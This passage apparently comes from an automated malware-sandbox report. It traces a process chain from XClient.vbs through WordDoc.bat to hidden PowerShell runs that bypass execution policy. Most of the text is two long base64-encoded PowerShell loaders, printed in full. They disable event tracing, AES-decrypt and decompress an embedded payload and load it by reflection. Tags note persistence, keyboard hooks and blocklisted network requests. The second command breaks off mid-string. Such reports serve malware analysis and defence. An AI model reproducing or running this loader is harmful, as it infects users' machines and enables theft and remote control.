                                            "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JGQ9InpWcnJiOXJJRnYrOFY5ci9ZZFpDd3Q0WWwiICsiQWVsYlZhVmxoTFNScnBwMlVDVGU0WFFhbSIgKyJJUDRLMnhXWHNJNFZiNTMvZWNlZGhqWXdLIiArImh1OUxsZyt2SG5QZnZQR2JTeVRMeWVCQkgiICsiaE0wWGZKMnk1Q0h3V0VxKy9mZ3ZBcjhGVCIgKyJlaGMzdHJ5SC95Tit2aWFjWmJZMmQyQThVIiArIjl3Ujk2UitsVUV6eFBxc2JxYjB4aS9heHIiICsiNWxNZkpHaGJYSmpSTVdmVzZmcHdHUXJWMyIgKyI1TmdaRytMVFZjQzltZkdtOWdBYy9wLzFZIiArIjN3bG54eXRaekFoZHUzQjBZNFdxMjVaY2giICsiK25ySit3Q1V0WTVMRjNWamVPZUJBdG1TVyIgKyJYUFdseWVaM280SDFndkhHcEh1UW5nNi93IiArImdWMDBZWlR5SklpbVkxS2J4LzR5TEZ1WWYiICsiNTRVdUNvVE1vMGw4VWR3V0lpdXJZRWUxKyIgKyJKVjh5cDZpTDh5dXhZdHc5QWx2OXBxcVdOIiArIlM4L21penhPZys4UldqYy8zZnpDUEV3Z08iICsidkRNV1NlWTNiRkpjTjFpbm5NMmJOMHZ3eiIgKyJ4ekZRVXpqeFVEaHQ1bFIyVXFLVzFUV1ZBIiArIk9VN3ZoK0FsUmxwVWY3U2hubmFycTV6N1MiICsieEltb1ZFYnRnSVp0U3pxb2pSc29oTTFCdCIgKyJJTTh0NG5XWUxKa3pKaVBwUnhWQU5NL2RoIiArIjl2SkZtN0Q5WUtOeHNDTkpsTzhUL2ZpZHEiICsicEpnVEJoSE8vZzdlZzJEdnh4Tlo2NFd0SiIgKyJaTEM3aU9RMmk4Zm01YlhXWENhU0RSWTZJIiArInhlVnJ5Mmxlc0VrUXNZdDFST2VCMTBsVE4iICsicjhQMTdaZEFSRTJDWmx3ZWxNdncwcGcxMyIgKyIrN3FEdU9TMGFiNjNyemdHZUwzeStEMEdkIiArIkp4NE9JcDZBUGdNRnA1am9YOUpEZ0I5YlgiICsiZFZmVmpzMjE2QWRZTW9RbDlXNUkwOVFsLyIgKyJlVjlHSGd1R1RBYU10OGxuU2dOMUtmT2tzIiArImZpdHA2cmVyME1lZURSbEdzRWpjdE9WTzYiICsiQjhnR1p2UFFnbm5iOVpqaFlNQytnSVpydiIgKyJrbytCejk2dkI4RlVpNis3RmE3bzBqQ0VTIiArImdDTUhsaUViOUFGQTQ0Z1NVRFJEQkJPRXkiICsicnMxWHdSc2ptc283anlNcVRURk1USzVCSCIgKyJJb2xQbTE3Zm9lczM0TFBidHVreENkSTcyIiArImlxRXBoSGNReHR3bHQwSENselJFTnl0b2YiICsiYjh5dnZJbUlsOG8xazBZUElwNEZhb2VUZCIgKyJJWkRVVlVFSitReXpvUUFGTHJNazUwTGU3IiArIkhBWllNeTdIelBNemxPS1dpZnBjRW5EVm0iICsiY2NxSlZXekhEWExQNEMyUDR6QzFTQU1rcyIgKyJHa1NMeU8vRzRkeFFycHJHbWttSERMWEtDIiArIlVnc2lFU3IyR0NYK2ZHWFJENThTcHRBc04iICsiNW1tbUQvM2dVV3BqSmFEaEw0aFd4UmorTiIgKyJ5U1VOQUtXZ0RhRytUNENISUNkVUNTajNxIiArIm9LL01MdDNWTlZydVZ5VmlOb3lTdWxFb1MiICsiUFZOYVNndUxpT3M0UnRmcENBc090VlZqYSIgKyIvQ0g2ZkFCVVBtbXM5YTh1MSt6Vm5LVERvIiArIko3R0hndDdETTFRKysvaXg5ZG9seDQvdFYiICsiM2g5M2NMcnEyTnhmeXJlWDRyckdWNWJKKyIgKyJLK2xWL1ZHa2w3SnE5T1NTTFVEaEQ0dk1UIiArIldoU0ZMY2haZjI5MThaZXVOdUpjNjlBeE4iICsiMUpyY1ZzTk01YWtoZStUTlh1VEZQbmIvOCIgKyIvUE9vSHQxaGY0Y2lIbkFMcmpIeWRsSTNWIiArIi9NQmNnSzJzanlpZW0zRVhRa1Z4V2lsbEYiICsibWcxUk8yMkIvRXRHL25TM2c3U1VKWk15VSIgKyJjWmlycG9UUFdHWUFGVU5BYWhYeVFPYWttIiArInN5QXc4OWpvc2FkZUVKcTN5VHAwem1wR1UiICsibzBwYUp5WGZPV2h0QkVMZE5PT1c3c1k2ZiIgKyJoWjIyb0lqN1FVQkh3QXkxRjJzeFVOVEk5IiArImE2cUljMnVlQmxkUndFdlpKUEY1a1dkRSsiICsiNjFBNzFzRHQyOXo1TXQ3aGVxdThiV1RvYiIgKyJvb3NpaE9FZnBsY2FmTVNCQlBYalVyemVWIiArIkZxRVlpazRHMi9NVk1rREJQRG55REhnZFciICsiNXF5dmxNd2tHVWpKS0E0QlNxYjVJVWpSeCIgKyJBZ1ZyWVZWN0hFRjJnOUtjaTVWTjhnY1NUIiArIkRMRG9ML2lkSlE3TDc0OXZQRWxtT21ubnIiICsiTmpOR1U2SVkzeGYwV3lvSnhTUEkxQjNMRCIgKyIzN0FKVUhzaEdMKytBUDkyYXd3ZDZpc01KIiArIkRBbHlkSEFJVFpLTm9ld2tWeFo4L2dqRHUiICsibktmWVRCUVBoOUtpZ0w5MUNoSkR0elpjSSIgKyJXSVd4K2NTZU1RMVFkeHVvNlRGS1EzSng1IiArImRiVW9VbnZsYjhkUDMwNmU2cVF4eVFoaE0iICsiT1Axak50Q2tQRXFiTnJXVjVZQWc2WWZoaCIgKyJaeXNDSVducDFham1SdnhNaGtjZ2hjaGJhIiArIkhRQlVKRWFhR0FsYlp0STNBbU5yK2F1dUkiICsiS0hpY25WYmVWY1hyUFV4ek9tRFBwWVd3ciIgKyJpSWxPaDk2di9mKzArdCtHZlordjd1NUd2IiArImE2bi92L3hZZy9Ib3ZmbTJOdGlKamxvQWoiICsiZHkzcElvQ0RlaXlsQkREREhHOWR1TnB3cyIgKyJrTjh2cEJaSUpHMVZWbTBUakJ5RzZUQmhIIiArIm9NaGkxQVNzUlh4WXBqekhybGx4RDFIdjkiICsiNTZXd09QUmhGTXpPQzZCUGZWQUdLSE5DSiIgKyJHamd0NEVPUUljSVJMOFZPdTRVY3hTU05tIiArIlBzVUVvdllBKzRpRVRIQnVyaGlpYjVoZloiICsiQUw3aW1WaUhIeHNwbThsTXIyeUt5eURSUSIgKyJHY2hiT2daK3BVdDRPbEFJZGxHcTVvVWxFIiArIkZieGoxUmNYSjRJak9jY2xKMnl3SUJvdSsiICsiOXNZK3JNcnlYZEp1T1Z0TDJ0N2FucDJLRSIgKyJCNjlPVlJIWkZDV2RuVFdydDVXRmVEYXg0IiArInpBSUVHc01tVG8wckdhd2ZZR0lsS2xpa1QiICsiaXhvSE5qZ2h1cyt5VzM0ZDdSYUNDMWlteiIgKyJCei9vYjVoRVdJWVA1WTE2dWVTMDVld0MvIiArIjR1TndwRDkzY1pzNFNuME9DSW5wMDRoLzkiICsiUkRNWFkvNmFLZUhRRldhUUExYVJtSWN0NSIgKyIydDlWZlhiY1dqck83VXN4b05FVVVMbGd5IiArIkQ5SVVUMWV3TDJsQW5sYzd3cXF5WjNQblgiICsiM0ZVMFkwWGExdTJBeGRQRG5NTVZGcmJkaiIgKyJZcVYrWFJRS1Z4SzhnNlladFlIVVM2UDUrIiArIlRsMWsxQVY1MjdWSDFJU2o0SVZjZHJmbHYiICsiRmszNUROOGVIVzNtR3pZN3NTR3BCZzd1RCIgKyJiSWtnRUhjOTdjRnZmYm9sUEFwMGozbmowIiArIlZCcWpTcVBZNDNOS2wyejR4RjBqZm9KSEEiICsiUERqS1ppM1o1cUJTUmdzTXF5dDBOUzNtTSIgKyJFeVNCS3lDT2htVE81bmpHcTJBUHlMTytQIiArInlNVys0RS9QejVLaEY1c1U1bnZ5SUphY0giICsiUmtQaDlZbWc5dWpGQnk3RnJ3c3hicEhGUiIgKyJEWDlyeW5oTmE2b2JDSDR5dkNsNHdUeDdOIiArIi90aXNtSlB1WmdIK3llS0hIN1lTSFVqMUQiICsiSm41aHpUVkMvYmRVWnRuRHNaSjJtdHh0cSIgKyJiZXRQUFRNM255b003M1hodG5kK1paeEN2IiArIkhLVUFPdEtyZUFFVzhzUC9CR3ljejR0bVUiICsiTlhjcGFqMXVWSlNrVXJKbUNsUnZublp2byIgKyJMUmJpM3VvZlVwTGQwc1B5MWhDbWxkM3lwIiArIjBGUnhubDRsK2wvc0Z1cXpWOVFWdmRvNloiICsiVWRGL2hQZEYyY3RPTXZkYnpWV0xIUm00eSIgKyJFWUI5NWV6VVl1c01rT20wb2REK1U4Q20xIiArIitsaUVhN3pPUURRMEJ2ZVZlTk0zLzd6cmEiICsieUFyTCszYTFXanFXQlphV1B5TVN1RndrVSIgKyJnbzFIOHp4amJ5K0xUWDhKR3c2bz0iOyRkPVtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkZCk7JG1zPU5ldy1PYmplY3QgSU8uTWVtb3J5U3RyZWFtKCwkZCk7JGRzPU5ldy1PYmplY3QgSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbSgkbXMsW0lPLkNvbXByZXNzaW9uLkNvbXByZXNzaW9uTW9kZV06OkRlY29tcHJlc3MpOyRzcj1OZXctT2JqZWN0IElPLlN0cmVhbVJlYWRlcigkZHMpO2lleCAkc3IuUmVhZFRvRW5kKCk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDg7ZnVuY3Rpb24gc2lkeXAoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJzI2UW9KQzB3V0YyNnJRWnZVdHM4V3Evb3hQU29HWWFnV1Z2VTB1TGw3MU09Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJzh1OVI1b2lqOS9jNnpYZjZELy9ERWc9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gZ2xmYXQoJHBhcmFtX3Zhcil7CUlFWCAnJGVrYWhkPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGp2ZG9yPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckY3VjdW89TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkZWthaGQsIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGN1Y3VvLkNvcHlUbygkanZkb3IpOwkkY3VjdW8uRGlzcG9zZSgpOwkkZWthaGQuRGlzcG9zZSgpOwkkanZkb3IuRGlzcG9zZSgpOwkkanZkb3IuVG9BcnJheSgpO31mdW5jdGlvbiBnYnhreCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckaHR1dnM9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0FzQUJDc2VBQkNtYkFCQ2xBQkN5QUJDXTo6TEFCQ29BQkNhQUJDZEFCQyhbYnl0ZVtdXSRwYXJhbV92YXIpOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRzZ29jeT0kaHR1dnMuQUJDRUFCQ25BQkN0QUJDckFCQ3lBQkNQQUJDb0FCQ2lBQkNuQUJDdEFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckc2dvY3kuQUJDSUFCQ25BQkN2QUJDb0FCQ2tBQkNlQUJDKCRudWxsLCAkcGFyYW0yX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7fSRnY2ogPSAkZW52OlVTRVJOQU1FOyRuaWpheiA9ICdDOlxVc2Vyc1wnICsgJGdjaiArICdBQkNcQUJDZEFCQ3dBQkNtQUJDLkFCQ2JBQkNhQUJDdEFCQycuUmVwbGFjZSgnQUJDJywgJycpOyRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJG5pamF6OyRkdGZ4aD1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam9pbiAnJykoJG5pamF6KS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkc2h5IGluICRkdGZ4aCkgewlpZiAoJHNoeS5TdGFydHNXaXRoKCc6OicpKQl7CQkkd2p4a209JHNoeS5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kYWpqdXQ9W3N0cmluZ1tdXSR3anhrbS5TcGxpdCgnXCcpO0lFWCAnJG9hcHVwPWdsZmF0IChzaWR5cCAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDcnRdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzZTZBQkM0QUJDU0FCQ3RBQkNyaUFCQ25BQkNnQUJDKCRhamp1dFswXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtJRVggJyRpZHN5bT1nbGZhdCAoc2lkeXAgKFtBQkNDQUJDb0FCQ25BQkN2QUJDZUFCQ3JBQkN0XTo6QUJDRkFCQ3JBQkNvQUJDbUFCQ0JBQkNhQUJDc0FCQ2VBQkM2QUJDNEFCQ1NBQkN0ckFCQ2lBQkNuQUJDZygkYWpqdXRbMV0pKSk7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7Z2J4a3ggJG9hcHVwICRudWxsO2dieGt4ICRpZHN5bSAoLFtzdHJpbmdbXV0gKCclQUJDJykpOw==')) | Invoke-Expression"
                                            4⤵
                                            • Blocklisted process makes network request
                                            • Command and Scripting Interpreter: PowerShell
                                            • Drops startup file
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            • Suspicious use of SetWindowsHookEx
                                            PID:4032
                                    • C:\Windows\System32\WScript.exe
                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\XClient.vbs"
                                      1⤵
                                      • Checks computer location settings
                                      PID:5392
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WordDoc.bat" "
                                        2⤵
                                          PID:5468
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\WordDoc.bat"
                                            3⤵
                                              PID:5528
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JGQ9InpWcnJiOXJJRnYrOFY5ci9ZZFpDd3Q0WWwiICsiQWVsYlZhVmxoTFNScnBwMlVDVGU0WFFhbSIgKyJJUDRLMnhXWHNJNFZiNTMvZWNlZGhqWXdLIiArImh1OUxsZyt2SG5QZnZQR2JTeVRMeWVCQkgiICsiaE0wWGZKMnk1Q0h3V0VxKy9mZ3ZBcjhGVCIgKyJlaGMzdHJ5SC95Tit2aWFjWmJZMmQyQThVIiArIjl3Ujk2UitsVUV6eFBxc2JxYjB4aS9heHIiICsiNWxNZkpHaGJYSmpSTVdmVzZmcHdHUXJWMyIgKyI1TmdaRytMVFZjQzltZkdtOWdBYy9wLzFZIiArIjN3bG54eXRaekFoZHUzQjBZNFdxMjVaY2giICsiK25ySit3Q1V0WTVMRjNWamVPZUJBdG1TVyIgKyJYUFdseWVaM280SDFndkhHcEh1UW5nNi93IiArImdWMDBZWlR5SklpbVkxS2J4LzR5TEZ1WWYiICsiNTRVdUNvVE1vMGw4VWR3V0lpdXJZRWUxKyIgKyJKVjh5cDZpTDh5dXhZdHc5QWx2OXBxcVdOIiArIlM4L21penhPZys4UldqYy8zZnpDUEV3Z08iICsidkRNV1NlWTNiRkpjTjFpbm5NMmJOMHZ3eiIgKyJ4ekZRVXpqeFVEaHQ1bFIyVXFLVzFUV1ZBIiArIk9VN3ZoK0FsUmxwVWY3U2hubmFycTV6N1MiICsieEltb1ZFYnRnSVp0U3pxb2pSc29oTTFCdCIgKyJJTTh0NG5XWUxKa3pKaVBwUnhWQU5NL2RoIiArIjl2SkZtN0Q5WUtOeHNDTkpsTzhUL2ZpZHEiICsicEpnVEJoSE8vZzdlZzJEdnh4Tlo2NFd0SiIgKyJaTEM3aU9RMmk4Zm01YlhXWENhU0RSWTZJIiArInhlVnJ5Mmxlc0VrUXNZdDFST2VCMTBsVE4iICsicjhQMTdaZEFSRTJDWmx3ZWxNdncwcGcxMyIgKyIrN3FEdU9TMGFiNjNyemdHZUwzeStEMEdkIiArIkp4NE9JcDZBUGdNRnA1am9YOUpEZ0I5YlgiICsiZFZmVmpzMjE2QWRZTW9RbDlXNUkwOVFsLyIgKyJlVjlHSGd1R1RBYU10OGxuU2dOMUtmT2tzIiArImZpdHA2cmVyME1lZURSbEdzRWpjdE9WTzYiICsiQjhnR1p2UFFnbm5iOVpqaFlNQytnSVpydiIgKyJrbytCejk2dkI4RlVpNis3RmE3bzBqQ0VTIiArImdDTUhsaUViOUFGQTQ0Z1NVRFJEQkJPRXkiICsicnMxWHdSc2ptc283anlNcVRURk1USzVCSCIgKyJJb2xQbTE3Zm9lczM0TFBidHVreENkSTcyIiArImlxRXBoSGNReHR3bHQwSENselJFTnl0b2YiICsiYjh5dnZJbUlsOG8xazBZUElwNEZhb2VUZCIgKyJJWkRVVlVFSitReXpvUUFGTHJNazUwTGU3IiArIkhBWllNeTdIelBNemxPS1dpZnBjRW5EVm0iICsiY2NxSlZXekhEWExQNEMyUDR6QzFTQU1rcyIgKyJHa1NMeU8vRzRkeFFycHJHbWttSERMWEtDIiArIlVnc2lFU3IyR0NYK2ZHWFJENThTcHRBc04iICsiNW1tbUQvM2dVV3BqSmFEaEw0aFd4UmorTiIgKyJ5U1VOQUtXZ0RhRytUNENISUNkVUNTajNxIiArIm9LL01MdDNWTlZydVZ5VmlOb3lTdWxFb1MiICsiUFZOYVNndUxpT3M0UnRmcENBc090VlZqYSIgKyIvQ0g2ZkFCVVBtbXM5YTh1MSt6Vm5LVERvIiArIko3R0hndDdETTFRKysvaXg5ZG9seDQvdFYiICsiM2g5M2NMcnEyTnhmeXJlWDRyckdWNWJKKyIgKyJLK2xWL1ZHa2w3SnE5T1NTTFVEaEQ0dk1UIiArIldoU0ZMY2haZjI5MThaZXVOdUpjNjlBeE4iICsiMUpyY1ZzTk01YWtoZStUTlh1VEZQbmIvOCIgKyIvUE9vSHQxaGY0Y2lIbkFMcmpIeWRsSTNWIiArIi9NQmNnSzJzanlpZW0zRVhRa1Z4V2lsbEYiICsibWcxUk8yMkIvRXRHL25TM2c3U1VKWk15VSIgKyJjWmlycG9UUFdHWUFGVU5BYWhYeVFPYWttIiArInN5QXc4OWpvc2FkZUVKcTN5VHAwem1wR1UiICsibzBwYUp5WGZPV2h0QkVMZE5PT1c3c1k2ZiIgKyJoWjIyb0lqN1FVQkh3QXkxRjJzeFVOVEk5IiArImE2cUljMnVlQmxkUndFdlpKUEY1a1dkRSsiICsiNjFBNzFzRHQyOXo1TXQ3aGVxdThiV1RvYiIgKyJvb3NpaE9FZnBsY2FmTVNCQlBYalVyemVWIiArIkZxRVlpazRHMi9NVk1rREJQRG55REhnZFciICsiNXF5dmxNd2tHVWpKS0E0QlNxYjVJVWpSeCIgKyJBZ1ZyWVZWN0hFRjJnOUtjaTVWTjhnY1NUIiArIkRMRG9ML2lkSlE3TDc0OXZQRWxtT21ubnIiICsiTmpOR1U2SVkzeGYwV3lvSnhTUEkxQjNMRCIgKyIzN0FKVUhzaEdMKytBUDkyYXd3ZDZpc01KIiArIkRBbHlkSEFJVFpLTm9ld2tWeFo4L2dqRHUiICsibktmWVRCUVBoOUtpZ0w5MUNoSkR0elpjSSIgKyJXSVd4K2NTZU1RMVFkeHVvNlRGS1EzSng1IiArImRiVW9VbnZsYjhkUDMwNmU2cVF4eVFoaE0iICsiT1Axak50Q2tQRXFiTnJXVjVZQWc2WWZoaCIgKyJaeXNDSVducDFham1SdnhNaGtjZ2hjaGJhIiArIkhRQlVKRWFhR0FsYlp0STNBbU5yK2F1dUkiICsiS0hpY25WYmVWY1hyUFV4ek9tRFBwWVd3ciIgKyJpSWxPaDk2di9mKzArdCtHZlordjd1NUd2IiArImE2bi92L3hZZy9Ib3ZmbTJOdGlKamxvQWoiICsiZHkzcElvQ0RlaXlsQkREREhHOWR1TnB3cyIgKyJrTjh2cEJaSUpHMVZWbTBUakJ5RzZUQmhIIiArIm9NaGkxQVNzUlh4WXBqekhybGx4RDFIdjkiICsiNTZXd09QUmhGTXpPQzZCUGZWQUdLSE5DSiIgKyJHamd0NEVPUUljSVJMOFZPdTRVY3hTU05tIiArIlBzVUVvdllBKzRpRVRIQnVyaGlpYjVoZloiICsiQUw3aW1WaUhIeHNwbThsTXIyeUt5eURSUSIgKyJHY2hiT2daK3BVdDRPbEFJZGxHcTVvVWxFIiArIkZieGoxUmNYSjRJak9jY2xKMnl3SUJvdSsiICsiOXNZK3JNcnlYZEp1T1Z0TDJ0N2FucDJLRSIgKyJCNjlPVlJIWkZDV2RuVFdydDVXRmVEYXg0IiArInpBSUVHc01tVG8wckdhd2ZZR0lsS2xpa1QiICsiaXhvSE5qZ2h1cyt5VzM0ZDdSYUNDMWlteiIgKyJCei9vYjVoRVdJWVA1WTE2dWVTMDVld0MvIiArIjR1TndwRDkzY1pzNFNuME9DSW5wMDRoLzkiICsiUkRNWFkvNmFLZUhRRldhUUExYVJtSWN0NSIgKyIydDlWZlhiY1dqck83VXN4b05FVVVMbGd5IiArIkQ5SVVUMWV3TDJsQW5sYzd3cXF5WjNQblgiICsiM0ZVMFkwWGExdTJBeGRQRG5NTVZGcmJkaiIgKyJZcVYrWFJRS1Z4SzhnNlladFlIVVM2UDUrIiArIlRsMWsxQVY1MjdWSDFJU2o0SVZjZHJmbHYiICsiRmszNUROOGVIVzNtR3pZN3NTR3BCZzd1RCIgKyJiSWtnRUhjOTdjRnZmYm9sUEFwMGozbmowIiArIlZCcWpTcVBZNDNOS2wyejR4RjBqZm9KSEEiICsiUERqS1ppM1o1cUJTUmdzTXF5dDBOUzNtTSIgKyJFeVNCS3lDT2htVE81bmpHcTJBUHlMTytQIiArInlNVys0RS9QejVLaEY1c1U1bnZ5SUphY0giICsiUmtQaDlZbWc5dWpGQnk3RnJ3c3hicEhGUiIgKyJEWDlyeW5oTmE2b2JDSDR5dkNsNHdUeDdOIiArIi90aXNtSlB1WmdIK3llS0hIN1lTSFVqMUQiICsiSm41aHpUVkMvYmRVWnRuRHNaSjJtdHh0cSIgKyJiZXRQUFRNM255b003M1hodG5kK1paeEN2IiArIkhLVUFPdEtyZUFFVzhzUC9CR3ljejR0bVUiICsiTlhjcGFqMXVWSlNrVXJKbUNsUnZublp2byIgKyJMUmJpM3VvZlVwTGQwc1B5MWhDbWxkM3lwIiArIjBGUnhubDRsK2wvc0Z1cXpWOVFWdmRvNloiICsiVWRGL2hQZEYyY3RPTXZkYnpWV0xIUm00eSIgKyJFWUI5NWV6VVl1c01rT20wb2REK1U4Q20xIiArIitsaUVhN3pPUURRMEJ2ZVZlTk0zLzd6cmEiICsieUFyTCszYTFXanFXQlphV1B5TVN1RndrVSIgKyJnbzFIOHp4amJ5K0xUWDhKR3c2bz0iOyRkPVtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkZCk7JG1zPU5ldy1PYmplY3QgSU8uTWVtb3J5U3RyZWFtKCwkZCk7JGRzPU5ldy1PYmplY3QgSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbSgkbXMsW0lPLkNvbXByZXNzaW9uLkNvbXByZXNzaW9uTW9kZV06OkRlY29tcHJlc3MpOyRzcj1OZXctT2JqZWN0IElPLlN0cmVhbVJlYWRlcigkZHMpO2lleCAkc3IuUmVhZFRvRW5kKCk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDg7ZnVuY3Rpb24gd3F1c3UoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJzlrRXF6UzlESWprYXRLaUV4Z3M2eVdDNVRUV1VZekwrTXZzMDdCdTMrMWM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ1BoM0pkeVIzOGY3Q3VHWU96QVFldHc9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gYnNoY2coJHBhcmFtX3Zhcil7CUlFWCAnJHlzdHNkPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHJzeWhqPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckc3loamY9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkeXN0c2QsIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJHN5aGpmLkNvcHlUbygkcnN5aGopOwkkc3loamYuRGlzcG9zZSgpOwkkeXN0c2QuRGlzcG9zZSgpOwkkcnN5aGouRGlzcG9zZSgpOwkkcnN5aGouVG9BcnJheSgpO31mdW5jdGlvbiB4Zm9vdygkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckZGFzYmk9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0FzQUJDc2VBQkNtYkFCQ2xBQkN5QUJDXTo6TEFCQ29BQkNhQUJDZEFCQyhbYnl0ZVtdXSRwYXJhbV92YXIpOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRweGh3bD0kZGFzYmkuQUJDRUFCQ25BQkN0QUJDckFCQ3lBQkNQQUJDb0FCQ2lBQkNuQUJDdEFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckcHhod2wuQUJDSUFCQ25BQkN2QUJDb0FCQ2tBQkNlQUJDKCRudWxsLCAkcGFyYW0yX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7fSRtZmEgPSAkZW52OlVTRVJOQU1FOyRia29sYSA9ICdDOlxVc2Vyc